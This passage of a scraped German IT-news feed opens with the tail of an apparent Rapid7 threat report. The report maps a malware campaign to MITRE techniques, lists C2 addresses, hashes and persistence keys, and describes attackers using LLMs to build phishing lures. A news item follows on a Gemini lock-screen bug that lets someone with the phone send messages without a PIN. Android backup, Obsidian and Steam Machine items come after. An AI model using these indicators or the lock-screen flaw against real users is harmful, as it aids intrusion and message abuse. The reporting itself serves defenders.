service. </span><span><span data-type="inlineCode">PROPFIND</span></span><span> requests and </span><span><span data-type="inlineCode">207</span></span><span> responses indicate directory browsing, which is typical when Windows Explorer accesses a remote WebDAV location. </span><span><span data-type="inlineCode">GET</span></span><span> requests and </span><span><span data-type="inlineCode">200</span></span><span> responses show file retrieval, including executable files opened or requested from the share.</span></p><p><span></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Method</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>PROPFIND</span></p></td><td><p><span>57,287</span></p></td></tr><tr><td><p><span>GET</span></p></td><td><p><span>13,088</span></p></td></tr><tr><td><p><span>OPTIONS</span></p></td><td><p><span>6,597</span></p></td></tr><tr><td><p><span>PROPPATCH</span></p></td><td><p><span>125</span></p></td></tr><tr><td><p><span>LOCK</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 4: HTTP methods observed in WebDAV delivery traffic.</em></span></p><p><span><em></em></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Status</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>207</span></p></td><td><p><span>57,412</span></p></td></tr><tr><td><p><span>200</span></p></td><td><p><span>19,532</span></p></td></tr><tr><td><p><span>206</span></p></td><td><p><span>154</span></p></td></tr></tbody></table><p><span><em>Table 5: HTTP status codes observed in WebDAV delivery traffic.</em></span></p><h2><span>MITRE ATT&amp;CK techniques</span></h2><table><colgroup data-width="1010"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Name</strong></span></p></td><td><p><span><strong>MITRE ATT&amp;CK technique</strong></span></p></td><td><p><span><strong>Code</strong></span></p></td></tr><tr><td><p><span>Payload execution</span></p></td><td><p><span>User Execution: Malicious File</span></p></td><td><p><span>T1204.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Right-to-Left Override</span></p></td><td><p><span>T1036.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Double File Extension</span></p></td><td><p><span>T1036.007</span></p></td></tr><tr><td><p><span>DLL sideloading</span></p></td><td><p><span>Hijack Execution Flow: DLL</span></p></td><td><p><span>T1574.001</span></p></td></tr><tr><td><p><span>Obfuscation</span></p></td><td><p><span>Encrypted/Encoded File</span></p></td><td><p><span>T1027.013</span></p></td></tr><tr><td><p><span>Payload unpacking</span></p></td><td><p><span>Deobfuscate/Decode Files or Information</span></p></td><td><p><span>T1140</span></p></td></tr><tr><td><p><span>Payload carrier</span></p></td><td><p><span>Steganography / image-carried payload data</span></p></td><td><p><span>T1027.003</span></p></td></tr><tr><td><p><span>API hiding</span></p></td><td><p><span>Dynamic API Resolution</span></p></td><td><p><span>T1027.007</span></p></td></tr><tr><td><p><span>In-memory loading</span></p></td><td><p><span>Reflective Code Loading</span></p></td><td><p><span>T1620</span></p></td></tr><tr><td><p><span>Injection</span></p></td><td><p><span>Process Hollowing</span></p></td><td><p><span>T1055.012</span></p></td></tr><tr><td><p><span>Native API use</span></p></td><td><p><span>Native API</span></p></td><td><p><span>T1106</span></p></td></tr><tr><td><p><span>Sandbox evasion</span></p></td><td><p><span>Time Based Evasion</span></p></td><td><p><span>T1497.003</span></p></td></tr><tr><td><p><span>Anti-analysis</span></p></td><td><p><span>Debugger / instrumentation checks</span></p></td><td><p><span>T1622</span></p></td></tr><tr><td><p><span>UAC bypass</span></p></td><td><p><span>Bypass User Account Control</span></p></td><td><p><span>T1548.002</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Registry Run Keys / Startup Folder</span></p></td><td><p><span>T1547.001</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Scheduled Task</span></p></td><td><p><span>T1053.005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Keylogging</span></p></td><td><p><span>T1056.001</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Screen Capture</span></p></td><td><p><span>T1113</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Clipboard Data</span></p></td><td><p><span>T1115</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Credentials from Web Browsers</span></p></td><td><p><span>T1555.003</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Steal Web Session Cookie</span></p></td><td><p><span>T1539</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Data from Local System</span></p></td><td><p><span>T1005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Automated Collection</span></p></td><td><p><span>T1119</span></p></td></tr><tr><td><p><span>Staging</span></p></td><td><p><span>Archive Collected Data: Archive via Utility</span></p></td><td><p><span>T1560.001</span></p></td></tr><tr><td><p><span>C2</span></p></td><td><p><span>Encrypted Channel</span></p></td><td><p><span>T1573</span></p></td></tr><tr><td><p><span>Exfiltration</span></p></td><td><p><span>Exfiltration Over C2 Channel</span></p></td><td><p><span>T1041</span></p></td></tr><tr><td><p><span>Possible persistence</span></p></td><td><p><span>WMI Event Subscription</span></p></td><td><p><span>T1546.003</span></p></td></tr><tr><td><p><span>Phishing lure generation</span></p></td><td><p><span>Generate Phishing Lures</span></p></td><td><p><span>AML.T0052</span></p></td></tr><tr><td><p><span>Resource Development</span></p></td><td><p><span>Resource Development</span></p></td><td><p><span>AML.TA0003</span></p></td></tr><tr><td><p><span>Obtain capabilities via LLM tooling</span></p></td><td><p><span>Obtain Capabilities</span></p></td><td><p><span>AML.T0016</span></p></td></tr><tr><td><p><span>LLM-assisted capability development</span></p></td><td><p><span>Develop Capabilities</span></p></td><td><p><span> AML.T0017</span></p></td></tr><tr><td><p><span>LLM prompt crafting for attack documentation</span></p></td><td><p><span>LLM Prompt Crafting</span></p></td><td><p><span>AML.T0065</span></p></td></tr><tr><td><p><span>Obtain capabilities via tooling</span></p></td><td><p><span>Obtain Capabilities: Software Tools</span></p></td><td><p><span>AML.T0016.001</span></p></td></tr></tbody></table><h2><span>Indicators of compromise (IOCs)</span></h2><h3>CURP campaign</h3><p>Phishing page: hxxps://gobf[.]mx </p><p>WebDav server: onedrive[.]cv</p><p></p><p>ReportFinal.&lt;RLO&gt;.scr    SHA256 04A8018191F2E9E76072D072A933371D9D669A42DE2B2A087541CD3A653B0BA7</p><p></p><p>C2: 77.110.127.205 ports 56001-56003 / 57666 / 57777 / 57888</p><p>Domain: google.services[.]ug</p><p>Campaign tag:06x12x2026SantaEbash2  (v4.4.3)</p><p>Schedule tasks: brokerhost, net_queue_32</p><p></p><p>Staging paths:</p><p>%TEMP%\is-XXXXX.tmp\Fo-Binary.exe </p><p>%AppData%\Roaming\inttracer_i686_prod\      </p><p> C:\ProgramData\inttracer_i686_prod\</p><h3>DlrtyGames campaign </h3><p>C2: 23[.]94[.]252[.]228:57666</p><p>JA3: fc54e0d16d9764783542f0146a98b300</p><p>DlrtyGames.exe</p><p>SHA256: e8be17a7fbef48b45f1e958b3ae5ebdfcad58808969982c431a905eefcae5268</p><p>discord-rpc.x64.dll</p><p>SHA256: 449d1121fa275879af22a20407aa7253ac750ac8fa7ff5691101752600d645df</p><p>profiler16.dll</p><p>SHA256: a88f5ee748e60f889d046718bfe3ddcf1c5f3cba2001cad587e8953a76bf7aa9</p><p>loader-pool.db</p><p>SHA256: 51a02eccdcae0483c7cbb9796738eee6c2a13b740d30e5417cda09bf418ea93b</p><p>.NET RAT</p><p>SHA256: 82e67735cf822db8f2f759e742e5bf8c54fdbd01a4170619b9e0916e1b3f5923</p><p>Staging paths:</p><p>C:\ProgramData\basenet\</p><p>%APPDATA%\basenet\</p><p>Persistence:</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XNNNMHJAZNCNHGIKJDW</p><p>\com_app_bg_i686</p><p>\messenger_component_v8_32_rc</p><p></p><p>More indicators of compromise can be found on Rapid7’s <a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank">GitHub</a>.</p><h2>Rapid7 customers</h2><p>Customers using Rapid7’s Intelligence Hub gain direct access to all IOCs from this campaign, including any future indicators as they are identified.</p><h2>Conclusion</h2><p><span>The operator’s OPSEC failed in the best way possible for defenders. Thanks to a completely exposed server, we managed to pull down their entire operational toolkit: staged payloads, lure templates, testing files, builder notes, and active campaign artifacts. This sloppiness effectively offered a rare, transparent view of their end-to-end delivery pipeline rather than just the final malware it served.</span></p><p><span>The real impact shows up in speed and scale. The actor generated lure variants in bulk, tested them systematically, documented results, and refined delivery techniques in short cycles. The artifacts also suggested that attackers used LLM for rapid lure generation and development since their cPanel was vibecoded. </span></p><p><span>While the fact that attackers are adopting genAI in their workflows is nothing new, looking past the novelty reveals a much more practical shift in adversary operations.</span></p><p><span>The takeaway isn’t that “AI wrote the malware.” It’s that the attacker used LLMs to operate more like a modern software product team. The use of genAI enables them to prototype, test, and scale their delivery pipeline at a fast pace.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern kein Gratis-Backup mehr: Schonfrist von 45 Tagen]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3681270/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681270/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</guid>
<pubDate>Mon, 20 Jul 2026 15:33:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer gilt die Änderung seit dem<strong> 7. Juli 2026</strong>. Für bestehende Nutzer gilt eine Schonfrist von <strong>45 Tagen</strong>, bis sie in Kraft tritt. Google informiert Nutzer per Mail dazu:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Wir möchten dich über eine bevorstehende Aktualisierung unserer Speicherrichtlinien informieren. Außerdem führen wir neue Steuerelemente ein, mit denen du deine Android-Sicherungen besser verwalten kannst.</p>



<p><strong>Richtlinienänderung:</strong> In 45 Tagen werden alle Daten, die in den Sicherungen deines Android-Geräts enthalten sind, auf das Speicherplatzlimit deines Google-Kontos angerechnet. Fotos und Videos in Google Fotos und MMS-Daten werden bereits jetzt in deinen Google-Kontospeicherplatz einbezogen. Mit dieser Änderung werden auch alle anderen gesicherten Daten wie SMS, Anruflisten, Geräteeinstellungen und App-Einstellungen auf deinen Google-Kontospeicherplatz angerechnet. Nach Inkrafttreten dieser Richtlinie wird deine Gerätesicherung möglicherweise mehr Speicherplatz belegen. Wenn das Speicherplatzlimit deines Google-Kontos überschritten ist, werden automatische Sicherungen pausiert, bis du Speicherplatz freigibst oder dein Abo upgradest.</p>
</blockquote>



<p>Laut Google werden die Auswirkungen dieser Änderung recht begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa <strong>40 Megabyte</strong> zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere <a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Backup-Methoden</a> setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android-Bug gefährdet Nutzer und verschickt unerlaubt SMS ohne PIN-Eingabe]]></title>
<description><![CDATA[Google hat offiziell bestätigt, dass in allen Android-Geräten mit Android 16 ein schwerwiegender Sicherheitsfehler besteht. Dieser sorgt dafür, dass die Gemini-KI unerlaubt SMS und Whatsapp-Nachrichten verschicken kann, ohne dass das Smartphone überhaupt entsperrt wurde.



Das liegt daran, dass ...]]></description>
<link>https://tsecurity.de/de/3681264/it-nachrichten/android-bug-gefaehrdet-nutzer-und-verschickt-unerlaubt-sms-ohne-pin-eingabe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681264/it-nachrichten/android-bug-gefaehrdet-nutzer-und-verschickt-unerlaubt-sms-ohne-pin-eingabe/</guid>
<pubDate>Mon, 20 Jul 2026 15:33:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google hat offiziell bestätigt, dass in allen Android-Geräten mit <a href="https://www.pcwelt.de/article/2781437/android-16-release-design-funktionen-kompatible-geraete.html" target="_blank" rel="noreferrer noopener">Android 16</a> ein schwerwiegender Sicherheitsfehler besteht. Dieser sorgt dafür, dass die Gemini-KI unerlaubt SMS und Whatsapp-Nachrichten verschicken kann, ohne dass das Smartphone überhaupt entsperrt wurde.</p>



<p>Das liegt daran, dass Gemini in den Sperrbildschirm integriert ist und somit einfach darauf Zugriff hat. Eine vorherige PIN-Eingabe ist nicht nötig. Das kann nicht nur lästig, sondern auch gefährlich werden, denn Angreifer können so auf Textnachrichten oder sensible Daten zugreifen, die eigentlich hinter dem Lockscreen bleiben sollten.</p>



<p>Wie die Seite <a href="https://www.theregister.com/security/2026/07/17/google-fixing-android-lock-screen-bug-that-lets-gemini-send-sms-without-a-pin/5273027" target="_blank" rel="noreferrer noopener">The Register</a> berichtet, sind Android-Geräte aller Hersteller betroffen. Um den Bug auszunutzen, bräuchte es aber direkten Zugriff auf das <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone</a>, also beispielsweise durch <a href="https://www.pcwelt.de/article/2335056/android-handy-diebstahlschutz-theft-detection-lock-ab-android-10.html" target="_blank" rel="noreferrer noopener">Diebstahl </a>oder <a href="https://www.pcwelt.de/article/3067790/smartphone-verloren-zugriff-auf-konten-wiederherstellen.html" target="_blank" rel="noreferrer noopener">wenn das Gerät verloren geht</a>.</p>



<h2 class="wp-block-heading">So schützen Sie sich</h2>



<p>Um zu verhindern, dass die Schwachstelle Auswirkungen auf die Sicherheit Ihres Geräts hat, können Sie Gemini den Zugriff auf Ihren Sperrbildschirm verweigern. Gehen Sie dazu in die Gemini-App auf Ihrem Android-Smartphone, tippen Sie auf Ihr Profilbild und gehen dann in die Einstellungen. Wählen Sie dort <strong>Gemini auf Sperrbildschirm</strong> und deaktivieren Sie die Option <strong>Verwendung von Gemini ohne Entsperren</strong> oder alternativ <strong>Antworten auf Sperrbildschirm</strong>.</p>



<p>Sie können auch den Zugriff von Gemini auf bestimmte Apps und Funktionen einschränken. Suchen Sie dafür den Menüpunkt <strong>Gemini-Apps-Aktivität</strong> und dann <strong>Erweiterungen</strong>. Wählen Sie alle Apps ab, auf die Gemini keinen Zugriff haben soll (beispielsweise Google Messages, Mail-Programme oder Whatsapp).</p>



<ol class="wp-block-list"></ol>



<p>Ein Google-Sprecher erklärte gegenüber The Register, dass das Unternehmen bereits eine Lösung für das Problem gefunden hat. Diese soll im Laufe der Woche via Android-Update implementiert werden. Halten Sie also die Android-Version Ihres Geräts immer aktuell, um solche Fixes zeitnah zu erhalten.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/3067254/android-datenschutzeinstellungen-smartphone-schuetzen-tipps.html" target="_blank" rel="noreferrer noopener">Schützen Sie Ihr Smartphone mit diesen 7 Android-Datenschutzeinstellungen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Obsidian: Neues Plugin bringt echten Nextcloud-Sync ohne Datenverlust - Caschys Blog]]></title>
<description><![CDATA[Das Plugin unterstützt neben macOS, Windows und Linux auch die mobilen Ableger für iOS und Android. ... Auf Server-Seite empfehlen die Entwickler ...]]></description>
<link>https://tsecurity.de/de/3681156/windows-server/obsidian-neues-plugin-bringt-echten-nextcloud-sync-ohne-datenverlust-caschys-blog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681156/windows-server/obsidian-neues-plugin-bringt-echten-nextcloud-sync-ohne-datenverlust-caschys-blog/</guid>
<pubDate>Mon, 20 Jul 2026 14:48:08 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Plugin unterstützt neben macOS, <b>Windows</b> und Linux auch die mobilen Ableger für iOS und Android. ... Auf <b>Server</b>-Seite empfehlen die Entwickler ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Meine neue Steam Machine ist ganz nett, aber leider eine große Enttäuschung]]></title>
<description><![CDATA[Ich habe diese Woche meine Steam Machine erhalten. Ich finde sie irgendwie toll, und doch bin ich von ihr enttäuscht. Es mag unfair sein, Valve die Schuld für die derzeitigen Probleme in der PC-Hardware-Branche zu geben … aber fair oder nicht: Die Steam Machine macht bei ihrem Preis einfach keine...]]></description>
<link>https://tsecurity.de/de/3681087/it-nachrichten/meine-neue-steam-machine-ist-ganz-nett-aber-leider-eine-grosse-enttaeuschung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681087/it-nachrichten/meine-neue-steam-machine-ist-ganz-nett-aber-leider-eine-grosse-enttaeuschung/</guid>
<pubDate>Mon, 20 Jul 2026 14:20:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ich habe diese Woche meine Steam Machine erhalten. Ich finde sie irgendwie toll, und doch bin ich von ihr enttäuscht. Es mag unfair sein, Valve die Schuld für die derzeitigen Probleme in der PC-Hardware-Branche zu geben … aber fair oder nicht: Die Steam Machine macht bei ihrem Preis einfach keinen Sinn – weder als erschwinglicher Gaming-PC noch als Alternative zu Spielekonsolen.</p>



<h2 class="wp-block-heading">Das Positive: Einfacher Zugriff auf SteamOS und meine Steam-Bibliothek</h2>



<p>Die Steam Machine ist auf den ersten Blick wirklich bezaubernd. Es handelt sich um einen Würfel mit einer Kantenlänge von circa 15 Zentimetern, der standardmäßig schwarz ist und durch eine austauschbare Kunststofffrontblende sowie eine LED-Anzeigeleiste an der Unterseite ein wenig Charakter erhält. Damit sieht sie aus, als hätten mein Gaming-PC und mein GameCube aus dem Jahr 2001 ein gemeinsames Kind gezeugt.</p>



<p>Dank des zurückhaltenden Designs fügt es sich nahtlos in eine Büroeinrichtung (im Grunde handelt es sich um einen klobigen <a href="https://www.pcwelt.de/article/3003041/die-besten-mini-pcs-im-test-fur-buro-streaming-gaming-und-server.html" target="_blank" rel="noreferrer noopener">Mini-PC</a>) oder ein elegantes Entertainment-Center ein. Sie können es jedoch mit einer individuellen Frontblende aufpeppen, wenn Sie möchten – ich habe bereits ein Auge auf ein 3D-gedrucktes „GabeCube“-Design geworfen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e12062e1e4"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_45ac23.png?w=1200" alt="Steam Machine rear " class="wp-image-3194004" width="1200" height="676" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Die Einrichtung im Konsolenstil verläuft zudem erstaunlich reibungslos. Schließen Sie das Gerät an die Stromversorgung und den HDMI-Anschluss an, verbinden Sie einen Controller und richten Sie eine WLAN-Verbindung sowie die Steam-Anmeldung ein. Ich war zwar etwas enttäuscht, als ich die üblichen automatischen Updates im PC-Stil sowohl für die Steam Machine als auch für den Steam Controller sah, aber so läuft es heutzutage nun einmal.</p>



<p>In weniger als 20 Minuten lud ich bereits Spiele herunter – ich begann mit <em>Hades II</em> – und wartete darauf, dass weitere im Hintergrund heruntergeladen wurden. Der Einrichtungsvorgang fühlt sich mehr oder weniger identisch an wie der, an den ich mich von meinem ersten Start der PS5 vor etwa vier Jahren erinnere.</p>



<p>Der größte Unterschied zu dieser Erfahrung besteht darin, dass die Steam Machine meiner Meinung nach etwas kleiner ist als meine klobige PS5. Vielleicht ist das kein fairer Vergleich, da die PS5 über ein Laufwerk verfügt … aber sie hat auch eine APU-Konfiguration und ist in Bezug auf die Hardware bei weitem nicht so leicht zugänglich.</p>



<p>Die Steam Machine ist zudem unglaublich leise. Selbst wenn ich sie mit den grafikintensivsten Spielen voll auslastete, konnte ich ihren Betrieb aus einer Entfernung von einem Meter kaum hören.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e12062eb80"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_8919c5.png?w=1200" alt="Steam Machine with its cover off, and soda can" class="wp-image-3194005" width="1200" height="676" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Kein Wunder, dass sie so leise ist – dieses kleine Gerät besteht zu 80 % seines Volumens aus Kühlkomponenten. </p></figcaption></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Wenn Sie bereits mit einem <a href="https://www.pcwelt.de/article/1203028/steam-deck-im-test-nur-eine-bessere-nintendo-switch.html" target="_blank" rel="noreferrer noopener">Steam Deck</a> experimentiert oder sich selbst eines zusammengebaut haben, wird Ihnen das alles sehr vertraut vorkommen. Valve hat sowohl bei der Steam-Plattform selbst als auch bei SteamOS beeindruckende Arbeit geleistet, um das System reibungslos und nahtlos zu gestalten. Mit dem Steam-Controller wird es sogar noch besser, obwohl jedes handelsübliche Xbox-kompatible Gamepad einwandfrei funktioniert, wenn Sie die Touchpads oder die Gyro-Steuerung nicht benötigen.</p>



<h2 class="wp-block-heading">Leistung – einige Höhen und Tiefen </h2>



<p>Ich habe einen neuen Durchgang in <em>Absolum</em> gestartet, einem meiner Favoriten aus dem letzten Jahr, um einen Eindruck von der allgemeinen Spielatmosphäre zu gewinnen. Ich habe dieses Spiel komplett an meinem Schreibtisch durchgespielt. Die Grafik in diesem Titel ist absolut umwerfend, allerdings handelt es sich um reines 2D – oder um eine Art von 3D, die so subtil ist, dass sie praktisch unsichtbar ist.</p>



<p>Wie zu erwarten war, bewältigte die Steam Machine mit ihrer AMD-CPU der Mittelklasse und der dedizierten GPU dieses Spiel in 4K völlig ruckelfrei.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e12062f5f2"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_72c1d4.png?w=1200" alt="Absolum screenshot" class="wp-image-3194018" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Das ist keine Überraschung. <em>Hades II</em> liegt technisch in etwa auf dem gleichen Niveau und bietet eine ganze Reihe von 3D-Modellen und Effekten auf dem Bildschirm. Auch weniger anspruchsvolle 3D-Spiele liefen butterweich – und <em>God of Weapons </em>funktionierte auf der Steam Machine sogar besser als auf meinem hochmodernen Gaming-PC, da ich aufgrund eines Problems mit meiner Windows-Konfiguration den Controller dort nie zum Laufen bringen konnte. Unter SteamOS lief alles reibungslos. Zeit für eine etwas größere Herausforderung.</p>



<p>Ich habe eines meiner Lieblings-Open-World-Spiele auf der Steam Machine getestet: <em>Horizon: Zero Dawn</em>. Das war seinerzeit ein Vorzeigetitel für die PS4, und die PS5-Remaster-Version erhielt eine PC-Portierung, die absolut umwerfend ist. Es ist zudem erstaunlich gut optimiert und läuft auch auf Handhelds ohne größere Probleme. Und auch auf der Steam Machine macht es eine gute Figur.</p>



<p>Ich habe die Auflösung auf 4K erhöht, die Grafik auf „hoch“ eingestellt und zusätzlich AMD FSR aktiviert, denn genau für solche filmreifen Meisterwerke wurde diese Technik entwickelt. Die Steam Machine bewältigte das Spiel sogar noch besser, als ich erwartet hatte: Im integrierten Benchmark erreichte sie 59 FPS und im Open-World-Spiel, in dem man gegen komplexe Robotermonster kämpft, konstant 50 bis 60 FPS.</p>


